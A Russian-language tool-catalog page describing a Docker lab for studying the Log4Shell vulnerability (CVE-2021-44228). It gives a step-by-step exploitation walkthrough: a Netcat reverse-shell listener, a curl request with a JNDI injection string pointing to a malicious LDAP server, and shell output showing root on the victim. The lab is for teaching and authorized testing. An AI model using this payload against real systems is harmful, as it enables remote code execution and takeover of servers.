Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
mi-laboratorio-log4shell — Автоматизированная лаборатория Plug & Play в Docker для аудита и изучения уязвимости Log4Shell (CVE-2021-44228) | Kitploit
Инструменты/GitHubGitHub/mafo-sec/mi-laboratorio-log4shell
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubmafo-sec/mi-laboratorio-log4shell

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

mi-laboratorio-log4shell

Автоматизированная лаборатория Plug & Play в Docker для аудита и изучения уязвимости Log4Shell (CVE-2021-44228)

Репозиторий
3 месяцев назадЕщё не проверено

🚀 Автоматизированная лаборатория Log4Shell (CVE-2021-44228) Play & Plug

Автоматизированная, однокомандная лаборатория для исследований безопасности, предназначенная для демонстрации и аудита уязвимости Log4Shell (CVE-2021-44228) удаленного выполнения кода (RCE).

Этот проект объединяет все необходимые компоненты (уязвимое приложение, вредоносный LDAP-сервер перенаправления и инструменты атакующего) в единую изолированную сетевую инфраструктуру с использованием Docker Compose.


⚙️ Ключевые особенности

  • 100% Plug & Play: Не требуется ручная настройка IP, редактирование файла .env или согласование сети. Все разрешается автоматически через внутренний DNS Docker.
  • Совместимость байт-кода: Эксплойт-код автоматически кросс-компилируется для обеспечения совместимости с более старой архитектурой виртуальной машины Java (JVM) жертвы, устраняя проблемы UnsupportedClassVersionError.
  • Централизованное развертывание: Полностью управляется единым оркестрационным слоем и интерактивным менеджером Bash-скриптов (configurar.sh), который автоматизирует удаление контейнеров, очистку кэша и пересборку.

🏗️ Обзор архитектуры

Лаборатория создает изолированную мостовую сеть (red-log4shell) с тремя ключевыми участниками:

  1. Жертва (web-vulnerable): Веб-приложение Spring Boot, использующее непропатченную уязвимую версию Log4j (2.14.1) на Java 8u111.
  2. LDAP-сервер (ldap-malicioso): Работает на marshalsec для перехвата входящих запросов поиска и динамического перенаправления жертвы на нагрузку атакующего.
  3. Атакующий (kali-tools): Пользовательский контейнер Kali Linux, который размещает HTTP-сервер Python для доставки скомпилированной нагрузки эксплойта (Exploit.class) и слушатель Netcat для получения реверс-шелла.

⚙️ Быстрый запуск

Для развертывания этой лаборатории на любой Linux-машине с установленным Docker выполните следующие команды в терминале:

root@kitploit:~
# 1. Clone the repository
git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git

# 2. Navigate to the project directory
cd mi-laboratorio-log4shell

# 3. Grant execution permissions to the script manager and launch the lab
chmod +x configurar.sh
./configurar.sh

🚀 Как провести эксплуатацию (пошагово)

Как только инфраструктура автоматически запустится с помощью скрипта, выполните следующие шаги, чтобы инициировать эксплойт и перехватить реверс-шелл.

Шаг 1: Настройка слушателя Netcat

Откройте новый терминал на вашей хост-машине (Ubuntu) и подключитесь к контейнеру атакующего, чтобы перевести Netcat в режим ожидания входящих подключений:

root@kitploit:~
sudo docker exec -it kali-tools bash

Внутри контейнера Kali запустите слушатель:

root@kitploit:~
nc -lvnp 4444

Вы увидите сообщение: listening on [any] 4444 ...

Шаг 2: Запуск вектора атаки

Откройте еще один отдельный терминал на хост-машине и отправьте вредоносную строку внедрения JNDI, встроенную в заголовок X-Api-Version:

root@kitploit:~
curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'

Шаг 3: Проверка реверс-шелла

Вернитесь к вашему терминалу Netcat. Вы должны увидеть активное соединение. Теперь вы можете выполнять команды от имени root внутри сервера-жертвы:

root@kitploit:~
connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164
whoami
root

⚠️ Отказ от ответственности

Этот репозиторий создан строго для образовательных целей, исследований в области безопасности и авторизованного академического аудита. Никогда не выполняйте эти инструменты или атаку на инфраструктуру без явного предварительного письменного разрешения владельцев инфраструктуры.

Скачать инструмент